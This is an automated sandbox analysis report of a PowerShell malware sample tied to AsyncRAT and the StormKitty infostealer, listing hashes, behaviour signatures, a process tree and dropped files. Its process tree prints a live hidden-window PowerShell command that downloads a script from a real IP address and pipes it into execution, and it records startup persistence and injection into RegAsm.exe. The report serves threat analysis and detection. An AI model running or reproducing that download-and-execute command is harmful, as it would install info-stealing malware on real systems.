Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-01-2025 18:12
Static task
static1
Behavioral task
behavioral1
Sample
wrcaf.ps1
Resource
win7-20240903-en
General
-
Target
wrcaf.ps1
-
Size
2KB
-
MD5
898d5189a1dc57fa7a80b4d986ef77c9
-
SHA1
aeb3667119b2fda564f498d26c04758caf44b1c5
-
SHA256
61270d6564a80eff42a00bf542fc79224949fb27df8c1d6d3acbaa6000fc8577
-
SHA512
d8cc4add28939f7072fad657b863f0e49ae420bae27a952db499f66caebbda79ff29a552f12ef0cd2cbd1d32003c0db940f0a16bceca196cd3684472c0c2e8c8
Malware Config
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/4572-58-0x0000000000400000-0x0000000000704000-memory.dmp family_stormkitty -
Stormkitty family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 7 2168 powershell.exe 16 1952 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1952 powershell.exe 2168 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1004 Package.exe -
Loads dropped DLL 1 IoCs
pid Process 1004 Package.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1952 set thread context of 4572 1952 powershell.exe 93 -
Program crash 1 IoCs
pid pid_target Process procid_target 2508 1004 WerFault.exe 84 -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Package.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2168 powershell.exe 2168 powershell.exe 2168 powershell.exe 2168 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 4572 RegAsm.exe 4572 RegAsm.exe 4572 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2168 powershell.exe Token: SeDebugPrivilege 1952 powershell.exe Token: SeDebugPrivilege 4572 RegAsm.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1004 Package.exe 1004 Package.exe 1004 Package.exe 4572 RegAsm.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2168 wrote to memory of 4556 2168 powershell.exe 83 PID 2168 wrote to memory of 4556 2168 powershell.exe 83 PID 4556 wrote to memory of 1004 4556 cmd.exe 84 PID 4556 wrote to memory of 1004 4556 cmd.exe 84 PID 4556 wrote to memory of 1004 4556 cmd.exe 84 PID 1004 wrote to memory of 232 1004 Package.exe 85 PID 1004 wrote to memory of 232 1004 Package.exe 85 PID 1004 wrote to memory of 232 1004 Package.exe 85 PID 232 wrote to memory of 1952 232 cmd.exe 87 PID 232 wrote to memory of 1952 232 cmd.exe 87 PID 232 wrote to memory of 1952 232 cmd.exe 87 PID 1952 wrote to memory of 3692 1952 powershell.exe 88 PID 1952 wrote to memory of 3692 1952 powershell.exe 88 PID 1952 wrote to memory of 3692 1952 powershell.exe 88 PID 3692 wrote to memory of 1056 3692 csc.exe 89 PID 3692 wrote to memory of 1056 3692 csc.exe 89 PID 3692 wrote to memory of 1056 3692 csc.exe 89 PID 1952 wrote to memory of 4908 1952 powershell.exe 92 PID 1952 wrote to memory of 4908 1952 powershell.exe 92 PID 1952 wrote to memory of 4908 1952 powershell.exe 92 PID 1952 wrote to memory of 4572 1952 powershell.exe 93 PID 1952 wrote to memory of 4572 1952 powershell.exe 93 PID 1952 wrote to memory of 4572 1952 powershell.exe 93 PID 1952 wrote to memory of 4572 1952 powershell.exe 93 PID 1952 wrote to memory of 4572 1952 powershell.exe 93 PID 1952 wrote to memory of 4572 1952 powershell.exe 93 PID 1952 wrote to memory of 4572 1952 powershell.exe 93 PID 1952 wrote to memory of 4572 1952 powershell.exe 93
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\wrcaf.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\Temp\Package.exeC:\Windows\Temp\Package.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:232 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5klvsxku\5klvsxku.cmdline"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC3AE.tmp" "c:\Users\Admin\AppData\Local\Temp\5klvsxku\CSC8C34315DEF604E7DAE7A3FF0EF13EE11.TMP"7⤵
- System Location Discovery: System Language Discovery
PID:1056
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:4908
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4572
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 2124⤵
- Program crash
PID:2508
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1004 -ip 10041⤵PID:3604
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5eb4d127b8a6f84a1cee423c5e3e3a51d
SHA1c55263a8ff097067f2393ce2120801a445fd1949
SHA256d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514
SHA51245a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e
-
Filesize
9KB
MD55b45bdbc306b85ffd33862fdf2746713
SHA1e640d40752eefe351571e0cd2002bcb447841d66
SHA256116d71cd5db8acbc0d66a1407b8ce6024dcfda370823875cdcdddd77c4798895
SHA512d9f7d0bcb21eab03322ffa0da3be75555742846ccf04b86acf957eb7726e42db54b085004700f599b6131106def464d4bb92973a349aaa6f56833c920a9d4566
-
Filesize
1KB
MD56ff1f8281029cbe08c13413c0c1813a5
SHA1d005949859f864be17fa0fb78172429ade0d98c8
SHA256ae000fb0debe58b48b758372fcb3ea92b7799f632b6675a4505f7ac0f91fb783
SHA512e7cb2e763ee00a38fae5a77487c8fc3b18839b5989c508db687de0e0260a41b6d74b0535ce9d828344b7877b350662f11f152c674301efcec10deaabba088d5b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
88KB
MD533ae2b9c3e710254fe2e2ce35ff8a7c8
SHA1109e32187254b27e04ef18bbe1b48fad42bca841
SHA2569c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68
SHA5122abe017e2f1d29fe789206d6483b9b33e7abd0871300d678eaba15e390d55c5e197d6cea6ea32dfdee5f65d082574adcc192a4fc0c9506bbba8ad7e957e12599
-
Filesize
201KB
MD52696d944ffbef69510b0c826446fd748
SHA1e4106861076981799719876019fe5224eac2655c
SHA256a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a
SHA512c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb
-
Filesize
10KB
MD53fa79decff8805745cea8116d9bb2643
SHA192343c5fa2c768b964ae3a4e9136e5d7193e8558
SHA256e6852a401b53a7af04d57aa1e4fc9621e3dffc1221534142316a27ae67e8f89c
SHA5125c2879e59fa6609e6e87f70c5237b250a906bf7dd13a343dac9e81635b1fc91ad9374e643a306b99503c52ce9bd56554a64aa132584c732d43ee39fb17305d78
-
Filesize
204B
MD58d01f07c7b4ca2abbdd79e41b35e9845
SHA1f03a63414cba40697bbf171d43fc728ddf0c1e71
SHA25618f9ac3be160f9c37916d732575ad3fa0e82a39c27dcc2decd33e885d1a93f36
SHA512bab3e766e4dc0ed2e21c02bd54fe55e82a57a02b824077ff7ac42df68b6ae6c818f68e9a3355525edbc727f4bf8533ad604607339da70b0551455f876636ebf8
-
Filesize
652B
MD51d90d798c5e3934ce9ed26c09323d7e9
SHA17bfa7bbe6b1af618459e6c864ecb85aa932a43d8
SHA256f56eb9abaae5c8e34c50b14c7b52bcdb248e4180fbbf37208b928679b5fdbb5a
SHA512d492ddf59886fecb0c59311e901afcfe86316d5d50717c7342b0df21ea1917c07a531a08364da69e89624acac03040871ab32ee93fd82a0ad0f5f86ecf44ceb1